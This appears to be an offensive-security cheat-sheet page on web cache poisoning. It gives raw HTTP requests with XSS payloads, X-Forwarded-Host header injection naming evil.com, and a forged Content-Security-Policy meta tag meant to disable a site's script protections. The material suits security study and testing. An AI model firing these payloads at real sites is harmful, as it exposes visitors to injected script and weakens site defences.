icon

Web Cache Poisoning

Last modified: 2023-10-18

Reflected XSS with Cache Poisoning

If the website reflects our arbitrary path in the result such as below.

https://example.com/xyz

# Output in the 404 page
Page not found: /xyz

We may try XSS as below.

https://example.com/xyz<script>alert(1)</script>

If we use Burp Repeater to send the request above, the URL won't be normalized so leads the reflected XSS. Then the cache will be poisoned. In this state, if you ask the victim to visit this URL, they will see this cached result. In other words, the reflected XSS is performed despite URL normalization in the victim's web browsers.


Meta Tag XSS

GET /?id=1 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com/example.jpg" />

Exploit

GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com"><script>alert(1)</script>
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/evil.com"><script>alert(1)</script>" />

Meta Tag CSP Overriding

If the website sets CSP (Content-Security-Policy) using meta tag, we can override this CSP settings by cache poisoning, then we can bypass CSP and may cause other attacks.

GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https:/victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">